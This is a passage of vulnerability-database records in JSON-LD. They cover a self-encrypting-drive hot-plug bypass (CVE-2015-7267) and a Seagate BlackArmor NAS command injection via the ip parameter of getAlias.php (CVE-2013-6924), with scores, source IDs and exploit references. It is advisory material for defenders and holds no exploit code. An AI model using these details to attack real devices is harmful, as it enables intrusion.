        "data": "Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in Sleep Mode, aka a \"Hot Plug attack.\". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker could exploit this vulnerability to bypass self-encrypting hard disk (SED) protection. Samsung/Seagate Self-Encrypting Drive Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. \nThe following products are vulnerable:\nSeagate ST500LT015 and ST500LT025\nSamsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-7267",
            "trust": 3.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "102336",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "id": "VAR-201711-0015",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          }
        ],
        "trust": 1.4942857200000002
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:32:03.075000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Samsung 850 Pro",
            "trust": 0.8,
            "url": "http://www.samsung.com/semiconductor/minisite/jp/ssd/consumer/850pro/"
          },
          {
            "title": "Samsung PM851 Solid State Drive",
            "trust": 0.8,
            "url": "https://www.samsung.com/us/business/oem-solutions/pdfs/PM851-SSD-ProdOverview.pdf"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-254",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
          },
          {
            "trust": 2.0,
            "url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7267"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7267"
          },
          {
            "trust": 0.3,
            "url": "www.samsung.com"
          },
          {
            "trust": 0.3,
            "url": "https://www.seagate.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102336"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "date": "2017-11-27T22:29:00.237000",
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102336"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          }
        ],
        "trust": 0.9
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samsung 850 Pro/PM851 of  SSD and  Seagate ST500LT015/ST500LT025 of  HDD Vulnerabilities that bypass security functions",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201710-0032

    Vulnerability from variot - Updated: 2025-04-20 23:25

    Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. The Seagate BlackArmor NAS device firmware contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The Seagate BlackArmor NAS is a network storage device. The BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability. Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code, steal cookie-based authentication credentials, and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server from Seagate Corporation of the United States, which provides layered protection, incremental data backup, and system backup and recovery for business-critical data.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201710-0032",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "seagate",
            "version": "sg2000-2000.1331"
          },
          {
            "model": "technology llc blackarmor nas sg2000-2000.1331",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "220"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jeroen - IT Nerdbox",
        "sources": [
          {
            "db": "BID",
            "id": "64655"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2013-6924",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-6924",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2014-00095",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-66926",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2013-6924",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-6924",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-6924",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00095",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201710-307",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-66926",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2013-6924",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS devices with firmware sg2000-2000.1331 allow remote attackers to execute arbitrary commands via shell metacharacters in the ip parameter to backupmgt/getAlias.php. Seagate BlackArmor NAS The device firmware contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform  certain unauthorized actions, execute HTML and script code and steal  cookie-based authentication credentials and execute arbitrary code.  Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. Seagate BlackArmor NAS is a network storage server of Seagate Corporation of the United States, which can provide layered protection, data increment and system backup and recovery for business-critical data",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=30725",
            "trust": 0.2,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-66926",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-6924",
            "trust": 3.5
          },
          {
            "db": "BID",
            "id": "64655",
            "trust": 2.7
          },
          {
            "db": "PACKETSTORM",
            "id": "124688",
            "trust": 2.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "30725",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "30723",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84090",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84092",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-61288",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "id": "VAR-201710-0032",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          }
        ],
        "trust": 1.54343433
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:25:56.900000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "BlackArmor NAS 220",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/support/external-hard-drives/network-storage/blackarmor-nas-220/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-77",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "http://packetstormsecurity.com/files/124688/seagate-blackarmor-nas-sg2000-2000.1331-remote-command-execution.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.securityfocus.com/bid/64655"
          },
          {
            "trust": 1.8,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90109"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6924"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6924"
          },
          {
            "trust": 0.7,
            "url": "http://www.exploit-db.com/exploits/30725/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/77.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "date": "2017-10-11T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "date": "2017-10-11T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2017-11-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "date": "2017-10-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "date": "2017-10-11T12:29:00.207000",
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00095"
          },
          {
            "date": "2017-11-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66926"
          },
          {
            "date": "2017-11-03T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-6924"
          },
          {
            "date": "2015-03-19T09:05:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2017-11-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          },
          {
            "date": "2017-10-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2013-6924"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS Command injection vulnerability in device firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006781"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201710-307"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201711-0010

    Vulnerability from variot - Updated: 2025-04-20 23:25

